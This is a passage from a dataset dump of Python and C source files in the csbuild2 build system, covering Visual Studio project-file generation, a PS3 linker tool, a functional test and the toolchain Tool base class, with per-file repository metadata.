globalPlatformHandlers.items():\n\t\tplatformHandler.WriteGlobalFooter(rootXmlNode, project)\n\n\t# Write out the XML file.\n\t_saveXmlFile(outputFilePath, rootXmlNode)\n\n\ndef _writeFiltersVcxProj(outputRootPath, project):\n\toutputFilePath = os.path.join(outputRootPath, project.GetVcxProjFilePath(\".filters\"))\n\toutputDirPath = os.path.dirname(outputFilePath)\n\n\trootXmlNode = _createRootXmlNode(\"Project\")\n\trootXmlNode.set(\"ToolsVersion\", \"4.0\")\n\trootXmlNode.set(\"xmlns\", \"http://schemas.microsoft.com/developer/msbuild/2003\")\n\n\t# Get a complete list of all items in the project.\n\tflatProjectItems = _buildFlatProjectItemList(project.items)\n\tif flatProjectItems:\n\t\t# Separate the folder items from the file items.\n\t\tprojectFolderItems = [item for item in flatProjectItems if item.itemType == VsProjectItemType.Folder]\n\t\tprojectFileItems = [item for item in flatProjectItems if item.itemType == VsProjectItemType.File]\n\t\tgroupedFileItems = {}\n\n\t\t# Split the file items by XML tag.\n\t\tfor item in projectFileItems:\n\t\t\tif item.tag not in groupedFileItems:\n\t\t\t\tgroupedFileItems.update({ item.tag: [] })\n\n\t\t\tgroupedFileItems[item.tag].append(item)\n\n\t\tif projectFolderItems:\n\t\t\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\n\t\t\t# Write out the filter nodes.\n\t\t\tfor item in projectFolderItems:\n\t\t\t\tfilterXmlNode = _addXmlNode(itemGroupXmlNode, \"Filter\")\n\t\t\t\tfilterXmlNode.set(\"Include\", os.path.join(item.dirPath, item.name))\n\n\t\t\t\tuniqueIdXmlNode = _addXmlNode(filterXmlNode, \"UniqueIdentifier\")\n\t\t\t\tuniqueIdXmlNode.text = item.guid\n\n\t\t# Go through each item tag.\n\t\tfor itemTag in sorted(groupedFileItems.keys()):\n\t\t\tfileItems = groupedFileItems[itemTag]\n\n\t\t\titemGroupXmlNode = _addXmlNode(rootXmlNode, \"ItemGroup\")\n\n\t\t\t# Write out the project file items for the current tag.\n\t\t\tfor item in fileItems:\n\t\t\t\tsourceFileXmlNode = _addXmlNode(itemGroupXmlNode, item.tag)\n\t\t\t\tsourceFileXmlNode.set(\"Include\", _constructRelPath(os.path.join(item.dirPath, item.name), outputDirPath))\n\n\t\t\t\tfilterXmlNode = _addXmlNode(sourceFileXmlNode, \"Filter\")\n\t\t\t\tfilterXmlNode.text = item.GetSegmentPath()\n\n\t# Write out the XML file.\n\t_saveXmlFile(outputFilePath, rootXmlNode)\n\n\ndef _writeUserVcxProj(outputRootPath, project, preserve):\n\toutputFilePath = os.path.join(outputRootPath, project.GetVcxProjFilePath(\".user\"))\n\n\t# Create the xml document if we're not explicitly preserving the old file or the old file doesn't exist.\n\tif not preserve or not os.access(outputFilePath, os.F_OK):\n\t\trootXmlNode = _createRootXmlNode(\"Project\")\n\t\trootXmlNode.set(\"ToolsVersion\", \"4.0\")\n\t\trootXmlNode.set(\"xmlns\", \"http://schemas.microsoft.com/developer/msbuild/2003\")\n\n\t\t# Write out the user debug settings\n\t\tif project.subType == VsProjectSubType.Normal:\n\t\t\tfor buildSpec in BUILD_SPECS:\n\t\t\t\t# Skip build specs that are not supported by the project.\n\t\t\t\tif buildSpec not in project.supportedBuildSpecs:\n\t\t\t\t\tcontinue\n\n\t\t\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\t\t\tplatformHandler.WriteUserDebugPropertyGroup(rootXmlNode, project, buildSpec, _getVsConfigName(buildSpec))\n\n\t\t# Write out the XML file.\n\t\t_saveXmlFile(outputFilePath, rootXmlNode)\n\n\telse:\n\t\t# No output file needed.\n\t\tlog.Build(\"[SKIPPING] {}\".format(outputFilePath))\n\n\n\ndef _writeProjectFiles(rootProject, outputRootPath, preserveUserFiles):\n\tglobal PLATFORM_HANDLERS\n\tglobal BUILD_SPECS\n\tglobal MAKEFILE_PATH\n\tglobal REGEN_FILE_PATH\n\n\tflatProjectList = _buildFlatProjectList(rootProject)\n\tglobalPlatformHandlers = {}\n\n\t# We'll need a single copy of each platform's handler regardless of VS config.\n\t# Having this mapping simplifies the lookup when writing the global sections.\n\tfor buildSpec in BUILD_SPECS:\n\t\tplatformHandler = PLATFORM_HANDLERS[buildSpec]\n\t\tvsPlatformName = platformHandler.GetVisualStudioPlatformName()\n\n\t\tif vsPlatformName not in globalPlatformHandlers:\n\t\t\tglobalPlatformHandlers.update({ vsPlatformName: platformHandler })\n\n\t# Write all the necessary files for each projects.\n\tfor project in flatProjectList:\n\t\tif project.projType == VsProjectType.Standard:\n\t\t\t_writeMainVcxProj(outputRootPath, project, globalPlatformHandlers)\n\t\t\t_writeFiltersVcxProj(outputRootPath, project)\n\t\t\t_writeUserVcxProj(outputRootPath, project, preserveUserFiles)\n\n\ndef UpdatePlatformHandlers(handlers): # pylint: disable=missing-docstring\n\tglobal PLATFORM_HANDLERS\n\n\tfixedHandlers = {}\n\n\t# Validate the handlers before adding the mappings to the global dictionary.\n\tfor key, cls in handlers:\n\t\tif isinstance(key, tuple) and cls is not None:\n\t\t\tkey = list(key) # Convert the key to a list so we can modify it if necessary.\n\n\t\t\t# Discard any tuple keys that don't have at least 3 elements.\n\t\t\tif len(key) < 3:\n\t\t\t\tlog.Warn(\"Discarding Visual Studio platform handler mapping due to incorrect key format: {}\".format(key))\n\t\t\t\tcontinue\n\n\t\t\t# Limit the key tuple to 3 elements.\n\t\t\tkey = key[:3]\n\n\t\t\t# It's valid for the 3rd element to be a string initially, but for the mappings, we'll need it in a list.\n\t\t\tif isinstance(key[2], str):\n\t\t\t\tkey[2] = ( key[2], )\n\n\t\t\t# Anything else will default to an empty list.\n\t\t\telif not isinstance(key[2], tuple) or key[2] is None:\n\t\t\t\tkey[2] = tuple()\n\n\t\t\t# Convert the key back to a tuple for mapping it into the fixed handlers dictionary.\n\t\t\tkey = tuple(key)\n\n\t\t\tfixedHandlers[key] = cls\n\n\tPLATFORM_HANDLERS.update(fixedHandlers)\n\n\ndef WriteProjectFiles(outputRootPath, solutionName, generators, vsVersion):\n\t\"\"\"\n\tWrite out the Visual Studio project files.\n\n\t:param outputRootPath: Root path for all output files.\n\t:type outputRootPath: str\n\n\t:param solutionName: Name of the output solution file.\n\t:type solutionName: str\n\n\t:param generators: List of project generators.\n\t:type generators: list[csbuild.tools.project_generators.visual_studio.VsProjectGenerator]\n\n\t:param vsVersion: Version of Visual Studio to create projects for.\n\t:type vsVersion: str\n\t\"\"\"\n\tglobal FILE_FORMAT_VERSION_INFO\n\n\tvsInstallInfo = FILE_FORMAT_VERSION_INFO.get(vsVersion, None)\n\tif not vsInstallInfo:\n\t\tlog.Error(\"Unknown version of Visual Studio: {}\".format(vsVersion))\n\t\treturn\n\n\tlog.Build(\"Creating project files for {}\".format(vsInstallInfo.friendlyName))\n\n\tgenerators = _evaluatePlatforms(generators, vsInstallInfo)\n\tif not generators:\n\t\tlog.Error(\"No projects available, cannot generate solution\")\n\t\treturn\n\n\t_createRegenerateBatchFile(outputRootPath)\n\n\trootProject = _buildProjectHierarchy(generators)\n\tpreserveUserFiles = True # TODO: This should eventually be set from a command line switch.\n\n\t_writeSolutionFile(rootProject, outputRootPath, solutionName, vsInstallInfo)\n\t_writeProjectFiles(rootProject, outputRootPath, preserveUserFiles)\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 13, "blob_id": "027cad1c66030e4536aada84796243c6058bc877", "content_id": "c264085f5cc8d161fa565f0476a39d21cfa1d179", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 28, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/functional_tests/cpp_recursive_header_test/hello_world/a.h", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n#include \"b.h\"\n" }, { "alpha_fraction": 0.7590425610542297, "alphanum_fraction": 0.7611702084541321, "avg_line_length": 35.153846740722656, "blob_id": "4d81d2fbbbb0451e10f955766ad8b0c5242c8264", "content_id": "8a9b89053d8d37c865a4634ec639a50062eaae3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1880, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/functional_tests/output_files_sync_after_build_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport subprocess\n\nfrom csbuild.toolchain import Tool\nfrom csbuild import log\n\ncsbuild.SetOutputDirectory(\"out\")\n\nclass Execute(Tool):\n\t\"\"\"Simple tool that executes its input files and returns a fake output\"\"\"\n\tinputFiles = {\".exe\", \"\"}\n\toutputFiles = {\".fake\"}\n\tsupportedArchitectures = None\n\n\tdef Run(self, inputProject, inputFile):\n\t\tlog.Command(\"Executing {}\", inputFile.filename)\n\t\tsubprocess.check_output([inputFile.filename])\n\t\treturn \"blah.fake\"\n\ncsbuild.Toolchain(\"gcc\", \"msvc\").AddTool(Execute)\n\nwith csbuild.Project(\"hello_world\", \"hello_world\"):\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6800376176834106, "alphanum_fraction": 0.6873498558998108, "avg_line_length": 33.43525314331055, "blob_id": "e26a1f74bc45e69ad0cedf7337c842267fe62d3f", "content_id": "bcf5e59f7370a92b5172a414274bd54aecf330f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9573, "license_type": "no_license", "max_line_length": 134, "num_lines": 278, "path": "/csbuild/tools/linkers/ps3_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps3_linker\n\t:synopsis: Implementation of the PS3 linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .linker_base import LinkerBase, LibraryError\n\nfrom ..common import FindLibraries\nfrom ..common.sony_tool_base import Ps3BaseTool, Ps3ProjectType, Ps3ToolsetType\n\nfrom ... import log\nfrom ..._build.input_file import InputFile\nfrom ..._utils import ordered_set, response_file, shared_globals\n\nclass Ps3Linker(Ps3BaseTool, LinkerBase):\n\t\"\"\"\n\tPS3 linker tool implementation.\n\t\"\"\"\n\tsupportedArchitectures = { \"cell\" }\n\n\tinputGroups = { \".o\" }\n\toutputFiles = { \".self\", \".prx\", \".sprx\", \".a\", \".spu_elf\", \".spu_so\" }\n\tcrossProjectDependencies = { \".prx\", \".sprx\", \".a\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs3BaseTool.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\n\t\tself._ldExeName = None\n\t\tself._arExeName = None\n\t\tself._linkerExeName = None\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs3BaseTool.SetupForProject(self, project)\n\n\t\t# Intentionally reimplementing LinkerBase.SetupForProject() since PS3 has different\n\t\t# requirements for dependent projects.\n\t\tlog.Linker(\"Verifying libraries for {}...\", project)\n\n\t\t# Make all the library directory paths are absolute after the macro formatter has been run on them.\n\t\tself._libraryDirectories = ordered_set.OrderedSet(\n\t\t\t[os.path.abspath(directory) for directory in self._libraryDirectories]\n\t\t)\n\n\t\tif self._libraries:\n\t\t\tself._actualLibraryLocations = self._findLibraries(project, self._libraries)\n\n\t\t\tif self._actualLibraryLocations is None:\n\t\t\t\traise LibraryError(project)\n\n\t\t# Fill in the locations of the depend projects, but only for libraries and SPU programs.\n\t\tfor dependProject in project.dependencies:\n\t\t\tif dependProject.projectType not in (\n\t\t\t\tcsbuild.ProjectType.Stub,\n\t\t\t\tPs3ProjectType.PpuSncApplication,\n\t\t\t\tPs3ProjectType.PpuGccApplication\n\t\t\t):\n\t\t\t\toutputExt = self._getOutputExtension(dependProject.projectType)\n\t\t\t\tif outputExt is not None:\n\t\t\t\t\tself._actualLibraryLocations[dependProject.outputName] = \\\n\t\t\t\t\t\tos.path.join(\n\t\t\t\t\t\t\tdependProject.outputDir,\n\t\t\t\t\t\t\t\"{}{}\".format(dependProject.outputName, outputExt)\n\t\t\t\t\t\t)\n\n\t\tself._arExeName = {\n\t\t\tPs3ToolsetType.PpuSnc: \"ps3snarl.exe\",\n\t\t\tPs3ToolsetType.PpuGcc: \"ppu-lv2-ar.exe\",\n\t\t\tPs3ToolsetType.Spu: \"spu-lv2-ar.exe\",\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\n\t\tself._linkerExeName = {\n\t\t\tPs3ToolsetType.PpuSnc: \"ps3ppuld.exe\",\n\t\t\tPs3ToolsetType.PpuGcc: \"ppu-lv2-g++.exe\",\n\t\t\tPs3ToolsetType.Spu: \"spu-lv2-g++.exe\",\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\n\t\tassert self._arExeName and self._linkerExeName, \"Invalid PS3 toolset type: {}\".format(self._ps3BuildInfo.toolsetType)\n\n\tdef _getOutputFiles(self, project):\n\t\toutputFilename = \"{}{}\".format(project.outputName, self._getOutputExtension(project.projectType))\n\t\toutputFullPath = os.path.join(project.outputDir, outputFilename)\n\n\t\t# PS3 SPU programs and shared libraries will be considered intermediate files since they will be converted\n\t\t# to compiled obj files and embedded in PPU programs.\n\t\tif project.projectType in (Ps3ProjectType.SpuApplication, Ps3ProjectType.SpuSharedLibrary):\n\t\t\toutputFullPath = os.path.join(project.GetIntermediateDirectory(InputFile(outputFullPath)), outputFilename)\n\n\t\toutputFiles = [outputFullPath]\n\n\t\t# For PPU shared libraries, the linker will automatically generate a stub library and verification log.\n\t\tif project.projectType in (Ps3ProjectType.PpuSncSharedLibrary, Ps3ProjectType.PpuGccSharedLibrary):\n\t\t\toutputFiles.extend([\n\t\t\t\tos.path.join(project.outputDir, \"cellPrx_{}_stub.a\".format(project.outputName)),\n\t\t\t\tos.path.join(project.outputDir, \"cellPrx_{}_verlog.txt\".format(project.outputName)),\n\t\t\t])\n\n\t\treturn tuple(outputFiles)\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType in (Ps3ProjectType.PpuSncStaticLibrary, Ps3ProjectType.PpuGccStaticLibrary, Ps3ProjectType.SpuStaticLibrary):\n\t\t\tuseResponseFile = False\n\t\t\tcmdExe = self._getArchiverName()\n\t\t\tcmd = [\"rcs\"] \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\t\telse:\n\t\t\tuseResponseFile = True\n\t\t\tcmdExe = self._getLinkerName()\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryPathArgs() \\\n\t\t\t\t+ self._getStartGroupArgs() \\\n\t\t\t\t+ self._getLibraryArgs() \\\n\t\t\t\t+ self._getEndGroupArgs()\n\n\t\tif useResponseFile:\n\t\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\t\tif shared_globals.showCommands:\n\t\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\t\tcmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\t\telse:\n\t\t\tcmd = [cmdExe] + cmd\n\n\t\treturn cmd\n\n\tdef _findLibraries(self, project, libs):\n\t\tallLibraryDirectories = list(self._libraryDirectories) + self._ps3SystemLibPaths\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".sprx\", \".prx\", \".a\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tPs3ProjectType.PpuSncApplication: \".self\",\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: \".sprx\",\n\t\t\tPs3ProjectType.PpuSncStaticLibrary: \".a\",\n\n\t\t\tPs3ProjectType.PpuGccApplication: \".self\",\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: \".prx\",\n\t\t\tPs3ProjectType.PpuGccStaticLibrary: \".a\",\n\n\t\t\tPs3ProjectType.SpuApplication: \".spu_elf\",\n\t\t\tPs3ProjectType.SpuSharedLibrary: \".spu_so\",\n\t\t\tPs3ProjectType.SpuStaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getLinkerName(self):\n\t\treturn os.path.join(self._ps3SystemBinPath, self._linkerExeName)\n\n\tdef _getArchiverName(self):\n\t\treturn os.path.join(self._ps3SystemBinPath, self._arExeName)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = {\n\t\t\tPs3ProjectType.PpuSncApplication: [\n\t\t\t\t\"-oformat=fself\",\n\t\t\t],\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: [\n\t\t\t\t\"-oformat=fsprx\",\n\t\t\t\t\"--prx-with-runtime\",\n\t\t\t],\n\n\t\t\tPs3ProjectType.PpuGccApplication: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-Wl,-oformat=fself\",\n\t\t\t],\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-mprx-with-runtime\",\n\t\t\t\t\"-zgenprx\",\n\t\t\t\t\"-zgenstub\",\n\t\t\t],\n\n\t\t\tPs3ProjectType.SpuApplication: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-fstack-check\",\n\t\t\t],\n\t\t\tPs3ProjectType.SpuSharedLibrary: [\n\t\t\t\t\"-pass-exit-codes\",\n\t\t\t\t\"-fstack-check\",\n\t\t\t\t\"-shared\",\n\t\t\t\t\"-Wl,-soname={}{}\".format(project.outputName, self._getOutputExtension(project.projectType)),\n\t\t\t],\n\t\t}.get(project.projectType, [])\n\n\t\treturn args\n\n\tdef _getCustomLinkerArgs(self):\n\t\treturn sorted(ordered_set.OrderedSet(self._linkerFlags))\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutFile = \"{}\".format(self._getOutputFiles(project)[0])\n\t\tif self._ps3BuildInfo.outputType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn [outFile]\n\t\treturn [\"-o\", outFile]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n\n\tdef _getLibraryPathArgs(self):\n\t\treturn []\n\n\tdef _getLibraryArgs(self):\n\t\targs = []\n\n\t\tfor libPath in self._actualLibraryLocations.values():\n\t\t\tlibNameExt = os.path.splitext(libPath)\n\n\t\t\t# PRX libraries can't be linked directly. We have to link against their static stub libraries\n\t\t\t# that are generated when they are built.\n\t\t\tif libNameExt[1] in (\".prx\", \".sprx\"):\n\t\t\t\tlibPath = os.path.join(os.path.dirname(libPath), \"cellPrx_{}_stub.a\".format(os.path.basename(libNameExt[0])))\n\n\t\t\telif libNameExt[1].startswith(\".spu_\"):\n\t\t\t\tlibPath = \"{}{}.a\".format(libNameExt[0], libNameExt[1].replace(\".\", \"_\"))\n\n\t\t\targs.append(libPath)\n\n\t\treturn args\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\n\t\t\t{\n\t\t\t\tPs3ToolsetType.PpuSnc: \"--start-group\",\n\t\t\t}.get(self._ps3BuildInfo.toolsetType, \"-Wl,--start-group\")\n\t\t]\n\n\tdef _getEndGroupArgs(self):\n\t\treturn [\n\t\t\t{\n\t\t\t\tPs3ToolsetType.PpuSnc: \"--end-group\",\n\t\t\t}.get(self._ps3BuildInfo.toolsetType, \"-Wl,--end-group\")\n\t\t]\n" }, { "alpha_fraction": 0.7522515654563904, "alphanum_fraction": 0.7527255415916443, "avg_line_length": 42.054420471191406, "blob_id": "1e304af7bf6e44d4fca1d5cdb26f62b733ce1960", "content_id": "9e775f838d4d8eaa06d5c66e111b70fccee11d50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12658, "license_type": "no_license", "max_line_length": 119, "num_lines": 294, "path": "/csbuild/toolchain/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: toolchain\n\t:synopsis: General-purpose toolchain infrastructure\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nfrom .._build import input_file\n\n_eliminatePylintAbstractMethodCheck = True\n\ndef _ignore(_):\n\tpass\n\nclass Tool(object):\n\t\"\"\"\n\tTool base class. Derive from this class to provide a tool for use in building things.\n\n\tTool constructor should take at least one argument, which will be the project settings dictionary.\n\tValues in this dictionary which pertain to the tool in question can ONLY be accessed from within that tool -\n\tthey are scoped. Thus, these values should be pulled out of the settings dict and stored as instance\n\tvariables on the tool itself, and the projectSettings dict itself should NOT be held onto -\n\tthis will ensure child classes of a tool can access all the data they need.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\n\t#: List of file extensions to be passed to Run as individual inputs.\n\t# Run() will be called once per file as soon as each file is available to build\n\t# Example: A C++ compiler would take individual inputs of types {\".c\", \".cc\", \".cxx\", \".cpp\"}\n\t# An empty string indicates a file with no extension\n\tinputFiles = set()\n\n\t#: List of file extensions to be passed to RunGroup as a group input.\n\t# RunGroup() will be called only once all tools that output this type have finished running\n\t# and will be called only once on the entire group.\n\t# Example: A C++ linker would take group inputs of types {\".o\"} or {\".obj\"} depending on the platform\n\t# An empty string indicates a file with no extension\n\t# **Note: A tool may set EITHER inputGroups OR crossProjectInputGroups, but not both.\n\t# If both are set, crossProjectInputGroups takes precedence**\n\tinputGroups = set()\n\n\t#: List of file extensions to be passed to Run as a group input, collected from all dependent projects.\n\t# RunGroup() will be called only once all tools in all dependent projects that output this type have finished running\n\t# and will be called only once on the entire group.\n\t# Example: An packaging tool might take inputs of type {\".so\"} from dependencies and add them to the package.\n\t# An empty string indicates a file with no extension\n\t# **Note: A tool may set EITHER inputGroups OR crossProjectInputGroups, but not both.\n\t# If both are set, crossProjectInputGroups takes precedence**\n\tcrossProjectInputGroups = set()\n\n\t#: List of dependencies that will prevent Run() from being called if they're still being created,\n\t# even if they're not taken as inputs.\n\t# Example: A C++ compiler might add dependencies of type {\".pch\"} or {\".gch\"} to wait on a precompile step\n\t# An empty string indicates a file with no extension\n\tdependencies = set()\n\n\t#: The file extensions of files created by this toolchain\n\t# Example: A C++ compiler would have output files of type {\".o\"} or {\".obj\"} depending on the platform\n\t# Or a C++ linker would have output files of type {\".exe\", \".dll\", \".lib\"} or {\"\", \".so\", \".a\"}\n\t# An empty string indicates a file with no extension\n\toutputFiles = set()\n\n\t#: Indicates what output files (if any) must completed on dependencies\n\t# before this tool is run on this project. Example: A C++ linker might need all dependencies to finish\n\t# generating files of type {\".dll\", \".lib\"} or {\".so\", \".a\"} before running itself. Any projects in the\n\t# dependency chain that generate files of that type will prevent this tool from running until it no longer\n\t# has any valid inputs for tools that will generate that output, and the outputs have all been generated.\n\tcrossProjectDependencies = set()\n\n\t#: Set of supported architectures. If this toolchain supports all possible --architecture arguments,\n\t# set this value to None. An empty set implies it supports no architectures and can never be run.\n\tsupportedArchitectures = None\n\n\t#: Set of supported platforms. If this toolchain supports all possible platforms,\n\t# set this value to None. An empty set implies it supports no platforms and can never be run.\n\tsupportedPlatforms = None\n\n\t#: Set this to a positive non-zero value to prevent this tool from being run in parallel.\n\t# This is a global setting; multiple instances of this tool will not run concurrently, even for different projects\n\tmaxParallel = 0\n\n\t#: If this is True, this tool will be the only one to act on the input files passed to it, and they will not\n\t# go to any other tool. If an input file passed to a tool marked exclusive should go to another tool, it may\n\t# be returned as an output from Run or RunGroup to forward it to the next tool. Exclusive tools for a given input\n\t# extension will always run before other tools for that input extension regardless of order in the toolchain;\n\t# if multiple tools in a toolchain are marked exclusive, the input files will only be passed to the first one;\n\t# however, if it outputs the same file type, its outputs will be passed to the second exclusive one, whose outputs\n\t# can be passed to the third, and so on; outputs from the last exclusive tool will be passed to all non-exclusive\n\t# tools accepting that file type.\n\texclusive = False\n\n\t_initialized = False\n\n\tdef __init__(self, projectSettings):\n\t\tpass\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tpass\n\n\t@staticmethod\n\tdef __static_init__():\n\t\tassert not Tool._initialized\n\t\tTool._initialized = True\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\t\t:raises NotImplementedError: if the subclass defines inputFiles and does not implement it\n\t\t\"\"\"\n\t\t_ignore(inputProject)\n\t\t_ignore(inputFile)\n\t\tif _eliminatePylintAbstractMethodCheck:\n\t\t\traise NotImplementedError()\n\t\treturn \"\"\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\t\"\"\"\n\t\tExecute a group build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFiles: List of files to build\n\t\t:type inputFiles: list[input_file.InputFile]\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\t\t:raises NotImplementedError: if the subclass defines inputGroups and does not implement it\n\t\t\"\"\"\n\t\t_ignore(inputProject)\n\t\t_ignore(inputFiles)\n\t\tif _eliminatePylintAbstractMethodCheck:\n\t\t\traise 